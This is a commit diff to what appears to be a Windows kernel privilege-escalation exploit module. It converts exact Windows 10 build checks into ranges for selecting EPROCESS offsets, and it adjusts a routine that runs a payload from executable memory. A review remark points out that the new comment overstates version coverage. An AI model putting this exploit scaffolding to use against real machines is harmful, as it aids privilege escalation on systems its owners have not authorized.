Fix Windows 10 versioning by using ranges

Spencer McIntyre 2021-05-18 10:26:52 -04:00
parent aae474a4d0
commit c5b022e2f2
3 changed files with 28 additions and 28 deletions


@ -8,6 +8,8 @@ fNtQuerySystemInformation NtQuerySystemInformation = NULL;
fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
if (!pMsfPayload)
return;
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pPayload)
return;
@ -35,6 +37,7 @@ BOOL ResolveRequirements(void) {
DWORD dwMajor, dwMinor, dwBuild;
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
dwBuild = LOWORD(dwBuild);
dprintf("[*] Windows version: %u.%u.%u", dwMajor, dwMinor, dwBuild);
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
@ -45,32 +48,29 @@ BOOL ResolveRequirements(void) {
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
/* targets for Windows 10 v1607 - v2009 (20H2) */
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild >= 14393) && (dwBuild <= 19041)) {
if ((dwBuild < 15063)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
}
else if ((dwBuild < 16299)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
}
else if ((dwBuild < 17134)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
}
else if ((dwBuild < 17763)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
}
else if ((dwBuild < 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
}
else if ((dwBuild < 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwBuild == 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
}
}
else {
return FALSE;
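Review bot: The comment on the new range branch says it covers Windows 10 v1607 through v2009 (20H2), but the guard `(dwBuild >= 14393) && (dwBuild <= 19041)` stops at v2004; 20H2 reports build 19042 and still reaches `return FALSE`. The comment should describe what the code accepts, for example `/* Windows 10 v1607 - v2004 (builds 14393 - 19041) */`. The inner ranges also give every build number between two releases the earlier release's structure offsets, while the offsets table appears to cite a layout only for the named release builds, so that assumption deserves a one-line comment saying how it was checked. The last inner test `else if ((dwBuild == 19041))` is always true under the outer bound and would read more clearly as a plain `else`. ResolveRequirements starts and ends outside the hunk.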


@ -47,9 +47,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };